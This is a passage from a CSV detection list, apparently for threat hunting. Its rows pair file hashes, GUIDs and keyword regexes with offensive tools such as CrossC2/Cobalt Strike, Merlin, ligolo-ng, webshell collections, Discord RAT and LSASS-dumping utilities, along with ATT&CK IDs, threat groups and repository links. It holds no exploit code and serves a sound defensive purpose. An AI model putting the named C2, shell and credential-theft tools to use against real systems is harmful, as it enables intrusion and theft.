TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37700" "*cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65*",".{0,1000}cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","37701" "*cbf0c66fd84a1f7f1adf764e887a1249afab4d475f652af4e534149ad97d1cce*",".{0,1000}cbf0c66fd84a1f7f1adf764e887a1249afab4d475f652af4e534149ad97d1cce.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37702" "*cbfccaef2077858123b86e747227500370be60843d0f0c4b65a8a2ab644d707e*",".{0,1000}cbfccaef2077858123b86e747227500370be60843d0f0c4b65a8a2ab644d707e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37705" "*cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7*",".{0,1000}cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37706" "*cc07636703d3e6ee9a011ffa8730cabbe9d49453fac9eb8a428fee4c36621453*",".{0,1000}cc07636703d3e6ee9a011ffa8730cabbe9d49453fac9eb8a428fee4c36621453.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37708" "*cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c*",".{0,1000}cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37710" "*CC12258F-AF24-4773-A8E3-45D365BCBDE9*",".{0,1000}CC12258F\-AF24\-4773\-A8E3\-45D365BCBDE9.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","37711" "*CC127443-2519-4E04-8865-A6887658CDE5*",".{0,1000}CC127443\-2519\-4E04\-8865\-A6887658CDE5.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/charlesnathansmith/whatlicense","1","0","#GUIDproject","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","37712" "*cc16da8e0b3d5f3f107f25413a2f0b7c71cba43ba7013e68a269e1bd96c34b65*",".{0,1000}cc16da8e0b3d5f3f107f25413a2f0b7c71cba43ba7013e68a269e1bd96c34b65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37714" "*cc19a3679601e440635849d43a38421ec3fff94013496911ef69b9c7d601572b*",".{0,1000}cc19a3679601e440635849d43a38421ec3fff94013496911ef69b9c7d601572b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37715" "*cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272*",".{0,1000}cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37716" "*cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272*",".{0,1000}cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","37717" "*cc2_keystrokes*",".{0,1000}cc2_keystrokes.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37719" "*cc2_keystrokes_*",".{0,1000}cc2_keystrokes_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37720" "*cc2_mimipenguin.*",".{0,1000}cc2_mimipenguin\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","37721" "*cc2_portscan*",".{0,1000}cc2_portscan.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37722" 
"*cc2_portscan_*",".{0,1000}cc2_portscan_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37723" "*cc2_rebind_*_get_recv*",".{0,1000}cc2_rebind_.{0,1000}_get_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37724" "*cc2_rebind_*_get_send*",".{0,1000}cc2_rebind_.{0,1000}_get_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37725" "*cc2_rebind_*_post_recv*",".{0,1000}cc2_rebind_.{0,1000}_post_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - 
APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37726" "*cc2_rebind_*_post_send*",".{0,1000}cc2_rebind_.{0,1000}_post_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37727" "*cc2_udp_server*",".{0,1000}cc2_udp_server.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE 
STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37728" "*cc23f1713dd1642bd70e2c51f4907429bbcc6ef0f08fbf8c5593af46e003b59f*",".{0,1000}cc23f1713dd1642bd70e2c51f4907429bbcc6ef0f08fbf8c5593af46e003b59f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37729" "*cc24850f03dccbd8ee3a372b06b2a77a95e5314bb68d2483b1814935978b7003*",".{0,1000}cc24850f03dccbd8ee3a372b06b2a77a95e5314bb68d2483b1814935978b7003.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#filehash","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","37730" "*cc2db2e4464dfa466d3e4db6ad9c1c4905c26b513230f319e68e94133bd639df*",".{0,1000}cc2db2e4464dfa466d3e4db6ad9c1c4905c26b513230f319e68e94133bd639df.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","37733" "*cc2FilesColor.*",".{0,1000}cc2FilesColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. 
CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","37734" "*cc2ProcessColor.*",".{0,1000}cc2ProcessColor\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","37735" "*cc30035b9a609304bf7b3541906aa49379b71df79c92b58ff5f957c4fd40a20e*",".{0,1000}cc30035b9a609304bf7b3541906aa49379b71df79c92b58ff5f957c4fd40a20e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
